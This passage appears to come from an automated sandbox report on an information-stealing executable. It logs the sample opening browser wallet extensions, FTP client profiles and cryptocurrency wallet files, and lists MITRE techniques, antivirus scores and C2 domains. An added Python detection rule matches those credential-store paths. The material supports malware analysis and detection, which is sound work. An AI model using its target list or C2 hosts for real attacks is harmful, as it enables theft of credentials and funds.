            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Users\user\Desktop\rdFy6abQ61.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: Process Memory Space: rdFy6abQ61.exe PID: 3916, type: MEMORYSTR
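The file-open and directory-query rows above are the raw material for a detection rule: a single non-browser process sweeping browser extension storage, cookie databases, FTP client profiles and desktop wallet directories, then walking the Documents tree over a thousand times. The following is an added example, not part of the Joe Sandbox report and not code from the sandbox vendor or from the sample. It scores a constructed file-access event feed against the store paths listed above. The event schema (ts, image, op, path), the per-family process allowlists and the 20-query enumeration threshold are assumptions to tune per environment; the sample events are constructed from the paths in this report.

```python
"""Detection logic for the stealer file-access pattern recorded above.

Added example, not Joe Sandbox code. The event schema (ts, image, op, path) is
an assumption standing in for a file-access telemetry feed (Sysmon file events
or an EDR file-open stream) landed in a SIEM; the sample events are constructed
from the paths in this report. Process allowlists and the enumeration threshold
are assumptions to tune per environment.
"""
import ntpath
import re
from collections import defaultdict

# Store families keyed on the path shapes the sandbox saw rdFy6abQ61.exe open.
# Patterns run against a normalised, lower-cased path.
STORE_FAMILIES = {
    "browser": [
        r"\\user data\\[^\\]+\\local extension settings\\",   # Chromium extension storage
        r"\\user data\\[^\\]+\\network\\cookies$",            # Chromium cookie DB
        r"\\user data\\[^\\]+\\web data$",                    # Chromium autofill DB
        r"\\firefox\\profiles\\[^\\]+\\cookies\.sqlite$",     # Firefox cookies
    ],
    "ftp_client": [
        r"\\(ftpgetter|ftpinfo|ftpbox|ftprush)(\\|$)",
        r"\\smartftp\\",
        r"\\sitedesigner\\3d-ftp(\\|$)",
    ],
    "crypto_wallet": [
        r"\\(exodus|ledger live|atomic|binance|guarda|com\.liberty\.jaxx)(\\|$)",
        r"\\(coinomi|bitcoin|electrum|electrum-ltc)\\wallets(\\|$)",
    ],
}
_COMPILED = {fam: [re.compile(p) for p in pats] for fam, pats in STORE_FAMILIES.items()}

# Assumption: processes allowed to touch each family. Browsers own their profile
# stores; wallet and FTP client binaries are left empty for the reader to fill in.
EXPECTED_ACCESSORS = {
    "browser": {"chrome.exe", "msedge.exe", "firefox.exe"},
    "ftp_client": set(),
    "crypto_wallet": set(),
}
DOCS_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\documents(\\|$)")
ENUM_ALLOWLIST = {"explorer.exe", "searchindexer.exe"}   # assumption: benign Documents walkers


def classify_store(path):
    """Return the store family a path belongs to, or None."""
    p = ntpath.normpath(path).lower()
    for fam, pats in _COMPILED.items():
        if any(rx.search(p) for rx in pats):
            return fam
    return None


def detect(events, enum_threshold=20):
    """One alert per process that sweeps credential stores, and one per process
    that enumerates the Documents tree in bulk (the report logged 1001 queries)."""
    touched = defaultdict(lambda: defaultdict(set))   # image -> family -> paths
    docs_queries = defaultdict(int)                    # image -> query count
    for ev in events:
        image = ev["image"].lower()
        path = ntpath.normpath(ev["path"]).lower()
        if ev["op"] == "File opened":
            fam = classify_store(path)
            if fam:
                touched[image][fam].add(path)
        elif ev["op"] == "Directory queried" and DOCS_RE.search(path):
            docs_queries[image] += 1

    alerts = []
    for image, fams in touched.items():
        unexpected = sorted(f for f in fams if image not in EXPECTED_ACCESSORS[f])
        # A browser touching only its own stores is normal; any process reaching
        # across families, or into a family it has no business with, is not.
        if len(fams) >= 2 or unexpected:
            alerts.append({"rule": "credential_store_sweep", "image": image,
                           "families": sorted(fams), "unexpected": unexpected,
                           "paths": sorted(p for ps in fams.values() for p in ps)})
    for image, n in docs_queries.items():
        if n >= enum_threshold and image not in ENUM_ALLOWLIST:
            alerts.append({"rule": "documents_enumeration_burst", "image": image, "count": n})
    return alerts


# Constructed sample feed modelled on the behaviour rows above, plus benign noise.
_DOCS = r"C:\Users\user\Documents"
_DECOYS = ["BPMLNOBVSB", "DVWHKMNFNN", "LTKMYBSEYZ", "UMMBDNEQBN", "ZBEDCJPBEY", "ONBQCLYSPU"]
SAMPLE_EVENTS = [
    {"ts": 0, "image": "chrome.exe", "op": "File opened",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"},
    {"ts": 1, "image": "chrome.exe", "op": "File opened",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"ts": 5, "image": "rdFy6abQ61.exe", "op": "File opened",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"},
    {"ts": 5, "image": "rdFy6abQ61.exe", "op": "File opened",
     "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite"},
    {"ts": 6, "image": "rdFy6abQ61.exe", "op": "File opened",
     "path": r"C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites"},
    {"ts": 6, "image": "rdFy6abQ61.exe", "op": "File opened",
     "path": r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"},
    {"ts": 7, "image": "rdFy6abQ61.exe", "op": "File opened",
     "path": r"C:\Users\user\AppData\Roaming\Electrum\wallets"},
    {"ts": 8, "image": "explorer.exe", "op": "Directory queried", "path": _DOCS},
] + [
    {"ts": 10 + i, "image": "rdFy6abQ61.exe", "op": "Directory queried", "path": ntpath.join(_DOCS, d)}
    for i, d in enumerate(_DECOYS * 4)   # 24 queries: repeated sweeps like the report's 1001
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The strongest single signal is the Local Extension Settings prefix: almost nothing but the browser itself opens those directories, so even one hit from an unexpected image is worth an alert on its own. The cross-family check catches the pattern this sample shows (browser, FTP and wallet stores in one burst), and the Documents burst rule covers the enumeration phase that precedes file theft. In production, the image path (here the sample ran from the user's Desktop) is a further field worth keying on.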

Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: rdFy6abQ61.exe PID: 3916, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix (a number in parentheses is the count of matched signatures mapped to that technique; techniques without a number are unmatched matrix placeholders)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (1); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (1); Process Injection (1); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (22); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (11); Virtualization/Sandbox Evasion (1); Process Discovery (1); File and Directory Discovery (2); System Information Discovery (22); Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Screen Capture (1); Archive Collected Data (1); Data from Local System (41); Clipboard Data (2); Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (21); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
rdFy6abQ61.exe | 39% | ReversingLabs |
rdFy6abQ61.exe | 49% | Virustotal |
rdFy6abQ61.exe | 100% | Avira | HEUR/AGEN.1306978
rdFy6abQ61.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
https://cloudewahsj.shop/api | 100% | Avira URL Cloud | malware
https://cloudewahsj.shop/apiP | 100% | Avira URL Cloud | malware
https://cloudewahsj.shop/apil | 100% | Avira URL Cloud | malware
https://cloudewahsj.shop/apie | 100% | Avira URL Cloud | malware
https://cloudewahsj.shop/ | 100% | Avira URL Cloud | malware
https://cloudewahsj.shop/C | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cloudewahsj.shop | 104.21.96.1 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
rabidcowse.shop | false | | high
wholersorie.shop | false | | high
https://cloudewahsj.shop/api | true | Avira URL Cloud: malware | unknown
cloudewahsj.shop | false | | high
noisycuttej.shop | false | | high
nearycrepso.shop | false | | high
framekgirus.shop | false | | high
tirepublicerj.shop | false | | high
abruptyopsn.shop | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cloudewahsj.shop/apiP | rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://duckduckgo.com/ac/?q= | rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.3.dr | false | | high
